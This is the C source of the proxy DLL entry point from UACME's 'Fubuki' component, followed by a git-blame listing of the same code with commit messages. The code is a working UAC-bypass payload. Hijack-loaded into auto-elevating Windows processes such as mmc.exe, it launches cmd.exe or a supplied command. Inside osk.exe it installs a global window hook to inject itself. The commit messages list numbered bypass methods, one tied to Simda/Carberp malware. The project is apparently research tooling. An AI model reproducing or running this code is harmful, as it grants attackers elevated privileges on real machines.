UACME/Source/Fubuki/dllmain.c

/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2017
*
*  TITLE:       DLLMAIN.C
*
*  VERSION:     2.80
*
*  DATE:        06 Sept 2017
*
*  Proxy dll entry point, Fubuki Kai Ni.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#if !defined UNICODE
#error ANSI build is not supported
#endif

//disable nonmeaningful warnings.
#pragma warning(disable: 4005) // macro redefinition
#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s
#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
#pragma warning(disable: 6102) // Using %s from failed function call at line %u

#include <windows.h>
#include "shared\ntos.h"
#include <ntstatus.h>
#include "shared\minirtl.h"
#include "shared\_filename.h"
#include "shared\util.h"
#include "unbcl.h"
#include "wbemcomn.h"

#if (_MSC_VER >= 1900) 
#ifdef _DEBUG
#pragma comment(lib, "vcruntimed.lib")
#pragma comment(lib, "ucrtd.lib")
#else
#pragma comment(lib, "libvcruntime.lib")
#endif
#endif

#define LoadedMsg      TEXT("Fubuki lock and loaded")

//default execution flow
#define AKAGI_FLAG_KILO  1

//suppress all additional output
#define AKAGI_FLAG_TANGO 2

DWORD g_AkagiFlag;

/*
* DummyFunc
*
* Purpose:
*
* Stub for fake exports.
*
*/
VOID WINAPI DummyFunc(
    VOID
)
{
}

/*
* DefaultPayload
*
* Purpose:
*
* Process parameter if exist or start cmd.exe and exit immediatelly.
*
*/
VOID DefaultPayload(
    VOID
)
{
    BOOL bIsLocalSystem = FALSE, bReadSuccess;
    PWSTR lpParameter = NULL;
    ULONG cbParameter = 0L;

    OutputDebugString(LoadedMsg);

    ucmIsLocalSystem(&bIsLocalSystem);
    g_AkagiFlag = AKAGI_FLAG_KILO;     

    bReadSuccess = ucmReadParameters(
        &lpParameter,
        &cbParameter,
        &g_AkagiFlag,
        NULL,
        bIsLocalSystem);

    ucmLaunchPayload(
        lpParameter,
        cbParameter);

    if ((lpParameter == NULL) && (cbParameter == 0)) {
        if (g_AkagiFlag == AKAGI_FLAG_KILO) {
            ucmQueryRuntimeInfo(FALSE);
        }
    }
    else {
        if (bReadSuccess) {
            RtlFreeHeap(
                NtCurrentPeb()->ProcessHeap,
                0,
                lpParameter);
        }
    }

    ExitProcess(0);
}

/*
* UiAccessMethodHookProc
*
* Purpose:
*
* Window hook procedure for UiAccessMethod
*
*/
LRESULT CALLBACK UiAccessMethodHookProc(
    _In_ int nCode,
    _In_ WPARAM wParam,
    _In_ LPARAM lParam
)
{
    return CallNextHookEx(NULL, nCode, wParam, lParam);
}

/*
* UiAccessMethodPayload
*
* Purpose:
*
* Defines application context and either:
* - installs windows hook for dll injection
* - run default payload in target app context
*
*/
VOID UiAccessMethodPayload(
    _In_ HINSTANCE hinstDLL
)
{
    LPWSTR lpFileName;
    HHOOK hHook;
    HOOKPROC HookProcedure;
    WCHAR szModuleName[MAX_PATH + 1];

    OutputDebugString(LoadedMsg);

    RtlSecureZeroMemory(szModuleName, sizeof(szModuleName));
    if (GetModuleFileName(NULL, szModuleName, MAX_PATH) == 0)
        return;

    lpFileName = _filename(szModuleName);
    if (lpFileName == NULL)
        return;

    //
    // Check if we are in the required application context
    // Are we inside osk.exe?
    //
    if (_strcmpi(lpFileName, TEXT("osk.exe")) == 0) {
        HookProcedure = (HOOKPROC)GetProcAddress(hinstDLL, "_FubukiProc2");
        if (HookProcedure) {
            hHook = SetWindowsHookEx(WH_CALLWNDPROC, HookProcedure, hinstDLL, 0);
            if (hHook) {
                //
                // Timeout to be enough to spawn target app.
                //
                Sleep(15000);
                UnhookWindowsHookEx(hHook);
            }
        }
        ExitProcess(0);
    }

    //
    // Are we inside target app?
    //
    if (_strcmpi(lpFileName, TEXT("mmc.exe")) == 0) {
        DefaultPayload();
    }
}

/*
* UiAccessMethodDllMain
*
* Purpose:
*
* Proxy dll entry point for uiAccess method.
* Need dedicated entry point because of additional code.
*
*/
BOOL WINAPI UiAccessMethodDllMain(
    _In_ HINSTANCE hinstDLL,
    _In_ DWORD fdwReason,
    _In_ LPVOID lpvReserved
)
{
    UNREFERENCED_PARAMETER(lpvReserved);

    if (fdwReason == DLL_PROCESS_ATTACH) {
        UiAccessMethodPayload(hinstDLL);
    }

    return TRUE;
}

/*
* DllMain
*
* Purpose:
*
* Default proxy dll entry point.
*
*/
BOOL WINAPI DllMain(
    _In_ HINSTANCE hinstDLL,
    _In_ DWORD fdwReason,
    _In_ LPVOID lpvReserved
)
{
    UNREFERENCED_PARAMETER(hinstDLL);
    UNREFERENCED_PARAMETER(lpvReserved);

    if (fdwReason == DLL_PROCESS_ATTACH) {
        DefaultPayload();
    }

    return TRUE;
}

/*
* EntryPoint
*
* Purpose:
*
* Entry point to be used in exe mode.
*
*/
VOID WINAPI EntryPoint(
    VOID)
{
    DefaultPayload();
}
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`/*******************************************************************************`
			`*`
v 2.5.3 Enigma0x3 method integrated as #25, some tweaks 2017-01-18 07:45:50 +00:00			`* (C) COPYRIGHT AUTHORS, 2014 - 2017`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`*`
			`* TITLE: DLLMAIN.C`
			`*`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`* VERSION: 2.80`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`*`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`* DATE: 06 Sept 2017`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`*`
v 1.9.0 mmc method added, optional second param to execute added 2015-09-17 07:31:36 +00:00			`* Proxy dll entry point, Fubuki Kai Ni.`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`*`
			`* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF`
			`* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED`
			`* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A`
			`* PARTICULAR PURPOSE.`
			`*`
			`*******************************************************************************/`

v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`#if !defined UNICODE`
			`#error ANSI build is not supported`
			`#endif`

v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`//disable nonmeaningful warnings.`
			`#pragma warning(disable: 4005) // macro redefinition`
v 1.9.0 mmc method added, optional second param to execute added 2015-09-17 07:31:36 +00:00			`#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s`
			`#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression`
			`#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union`
			`#pragma warning(disable: 6102) // Using %s from failed function call at line %u`

			`#include <windows.h>`
v 2.5.7 Mostly maintenance with bug fixes, yuubari updated for 15048 2017-03-08 06:51:38 +00:00			`#include "shared\ntos.h"`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`#include <ntstatus.h>`
v 2.5.7 Mostly maintenance with bug fixes, yuubari updated for 15048 2017-03-08 06:51:38 +00:00			`#include "shared\minirtl.h"`
v 2.7.1 uiAccess method added as 32, Yuubari updated with uiAccess output (use /v to view all) 2017-05-09 03:39:44 +00:00			`#include "shared\_filename.h"`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`#include "shared\util.h"`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`#include "unbcl.h"`
v 2.4.0 method 20 added 2016-07-05 08:28:44 +00:00			`#include "wbemcomn.h"`
v 1.9.0 mmc method added, optional second param to execute added 2015-09-17 07:31:36 +00:00
			`#if (_MSC_VER >= 1900)`
			`#ifdef _DEBUG`
			`#pragma comment(lib, "vcruntimed.lib")`
			`#pragma comment(lib, "ucrtd.lib")`
			`#else`
			`#pragma comment(lib, "libvcruntime.lib")`
			`#endif`
			`#endif`

v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`#define LoadedMsg TEXT("Fubuki lock and loaded")`
v 2.5.0 methods 21, 22 added 2016-07-07 14:16:12 +00:00
			`//default execution flow`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`#define AKAGI_FLAG_KILO 1`
v 2.5.0 methods 21, 22 added 2016-07-07 14:16:12 +00:00
			`//suppress all additional output`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`#define AKAGI_FLAG_TANGO 2`
v 2.5.0 methods 21, 22 added 2016-07-07 14:16:12 +00:00
			`DWORD g_AkagiFlag;`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`/*`
			`* DummyFunc`
			`*`
			`* Purpose:`
			`*`
			`* Stub for fake exports.`
			`*`
			`*/`
v 2.5.0 methods 21, 22 added 2016-07-07 14:16:12 +00:00			`VOID WINAPI DummyFunc(`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`VOID`
v 2.7.1 uiAccess method added as 32, Yuubari updated with uiAccess output (use /v to view all) 2017-05-09 03:39:44 +00:00			`)`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`{`
			`}`

v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`/*`
v 2.7.1 uiAccess method added as 32, Yuubari updated with uiAccess output (use /v to view all) 2017-05-09 03:39:44 +00:00			`* DefaultPayload`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`*`
			`* Purpose:`
			`*`
v 2.7.1 uiAccess method added as 32, Yuubari updated with uiAccess output (use /v to view all) 2017-05-09 03:39:44 +00:00			`* Process parameter if exist or start cmd.exe and exit immediatelly.`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`*`
			`*/`
v 2.7.1 uiAccess method added as 32, Yuubari updated with uiAccess output (use /v to view all) 2017-05-09 03:39:44 +00:00			`VOID DefaultPayload(`
			`VOID`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`)`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`{`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`BOOL bIsLocalSystem = FALSE, bReadSuccess;`
			`PWSTR lpParameter = NULL;`
			`ULONG cbParameter = 0L;`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`OutputDebugString(LoadedMsg);`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`ucmIsLocalSystem(&bIsLocalSystem);`
			`g_AkagiFlag = AKAGI_FLAG_KILO;`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`bReadSuccess = ucmReadParameters(`
			`&lpParameter,`
			`&cbParameter,`
			`&g_AkagiFlag,`
			`NULL,`
			`bIsLocalSystem);`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`ucmLaunchPayload(`
			`lpParameter,`
			`cbParameter);`
v 2.7.1 uiAccess method added as 32, Yuubari updated with uiAccess output (use /v to view all) 2017-05-09 03:39:44 +00:00
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`if ((lpParameter == NULL) && (cbParameter == 0)) {`
v 2.8.4 Method 44 added, readme update, fixed several software regressions added in v2.8.0 and v2.8.3 2017-11-22 09:54:51 +00:00			`if (g_AkagiFlag == AKAGI_FLAG_KILO) {`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`ucmQueryRuntimeInfo(FALSE);`
v 2.8.4 Method 44 added, readme update, fixed several software regressions added in v2.8.0 and v2.8.3 2017-11-22 09:54:51 +00:00			`}`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`}`
			`else {`
			`if (bReadSuccess) {`
			`RtlFreeHeap(`
			`NtCurrentPeb()->ProcessHeap,`
			`0,`
			`lpParameter);`
v 2.7.1 uiAccess method added as 32, Yuubari updated with uiAccess output (use /v to view all) 2017-05-09 03:39:44 +00:00			`}`
			`}`
v 2.8.4 Method 44 added, readme update, fixed several software regressions added in v2.8.0 and v2.8.3 2017-11-22 09:54:51 +00:00
v 2.7.1 uiAccess method added as 32, Yuubari updated with uiAccess output (use /v to view all) 2017-05-09 03:39:44 +00:00			`ExitProcess(0);`
			`}`

			`/*`
			`* UiAccessMethodHookProc`
			`*`
			`* Purpose:`
			`*`
			`* Window hook procedure for UiAccessMethod`
			`*`
			`*/`
			`LRESULT CALLBACK UiAccessMethodHookProc(`
			`_In_ int nCode,`
			`_In_ WPARAM wParam,`
			`_In_ LPARAM lParam`
			`)`
			`{`
			`return CallNextHookEx(NULL, nCode, wParam, lParam);`
			`}`

			`/*`
			`* UiAccessMethodPayload`
			`*`
			`* Purpose:`
			`*`
			`* Defines application context and either:`
			`* - installs windows hook for dll injection`
			`* - run default payload in target app context`
			`*`
			`*/`
			`VOID UiAccessMethodPayload(`
			`_In_ HINSTANCE hinstDLL`
			`)`
			`{`
Configuration update ReleaseInternal configuration added (this is the same as Release but with PostBuild Event). Default Release configuration now ships without post build event enabled as it seems confusing a lot of people. 2017-05-26 17:54:22 +00:00			`LPWSTR lpFileName;`
v 2.7.1 uiAccess method added as 32, Yuubari updated with uiAccess output (use /v to view all) 2017-05-09 03:39:44 +00:00			`HHOOK hHook;`
			`HOOKPROC HookProcedure;`
			`WCHAR szModuleName[MAX_PATH + 1];`

v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`OutputDebugString(LoadedMsg);`

v 2.7.1 uiAccess method added as 32, Yuubari updated with uiAccess output (use /v to view all) 2017-05-09 03:39:44 +00:00			`RtlSecureZeroMemory(szModuleName, sizeof(szModuleName));`
			`if (GetModuleFileName(NULL, szModuleName, MAX_PATH) == 0)`
			`return;`

			`lpFileName = _filename(szModuleName);`
			`if (lpFileName == NULL)`
			`return;`

			`//`
			`// Check if we are in the required application context`
			`// Are we inside osk.exe?`
			`//`
			`if (_strcmpi(lpFileName, TEXT("osk.exe")) == 0) {`
			`HookProcedure = (HOOKPROC)GetProcAddress(hinstDLL, "_FubukiProc2");`
			`if (HookProcedure) {`
			`hHook = SetWindowsHookEx(WH_CALLWNDPROC, HookProcedure, hinstDLL, 0);`
			`if (hHook) {`
			`//`
			`// Timeout to be enough to spawn target app.`
			`//`
			`Sleep(15000);`
			`UnhookWindowsHookEx(hHook);`
			`}`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`}`
			`ExitProcess(0);`
			`}`
v 2.7.1 uiAccess method added as 32, Yuubari updated with uiAccess output (use /v to view all) 2017-05-09 03:39:44 +00:00
			`//`
			`// Are we inside target app?`
			`//`
			`if (_strcmpi(lpFileName, TEXT("mmc.exe")) == 0) {`
			`DefaultPayload();`
			`}`
			`}`

			`/*`
			`* UiAccessMethodDllMain`
			`*`
			`* Purpose:`
			`*`
			`* Proxy dll entry point for uiAccess method.`
			`* Need dedicated entry point because of additional code.`
			`*`
			`*/`
			`BOOL WINAPI UiAccessMethodDllMain(`
			`_In_ HINSTANCE hinstDLL,`
			`_In_ DWORD fdwReason,`
			`_In_ LPVOID lpvReserved`
			`)`
			`{`
			`UNREFERENCED_PARAMETER(lpvReserved);`

v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`if (fdwReason == DLL_PROCESS_ATTACH) {`
v 2.7.1 uiAccess method added as 32, Yuubari updated with uiAccess output (use /v to view all) 2017-05-09 03:39:44 +00:00			`UiAccessMethodPayload(hinstDLL);`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`}`
v 2.7.1 uiAccess method added as 32, Yuubari updated with uiAccess output (use /v to view all) 2017-05-09 03:39:44 +00:00
			`return TRUE;`
			`}`

			`/*`
			`* DllMain`
			`*`
			`* Purpose:`
			`*`
			`* Default proxy dll entry point.`
			`*`
			`*/`
			`BOOL WINAPI DllMain(`
			`_In_ HINSTANCE hinstDLL,`
			`_In_ DWORD fdwReason,`
			`_In_ LPVOID lpvReserved`
			`)`
			`{`
			`UNREFERENCED_PARAMETER(hinstDLL);`
			`UNREFERENCED_PARAMETER(lpvReserved);`

v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`if (fdwReason == DLL_PROCESS_ATTACH) {`
v 2.7.1 uiAccess method added as 32, Yuubari updated with uiAccess output (use /v to view all) 2017-05-09 03:39:44 +00:00			`DefaultPayload();`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`}`
v 2.7.1 uiAccess method added as 32, Yuubari updated with uiAccess output (use /v to view all) 2017-05-09 03:39:44 +00:00
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`return TRUE;`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`}`
v 2.7.6 Method 38 added, readme updated. 2017-07-13 13:12:55 +00:00
			`/*`
			`* EntryPoint`
			`*`
			`* Purpose:`
			`*`
			`* Entry point to be used in exe mode.`
			`*`
			`*/`
			`VOID WINAPI EntryPoint(`
			`VOID)`
			`{`
			`DefaultPayload();`
			`}`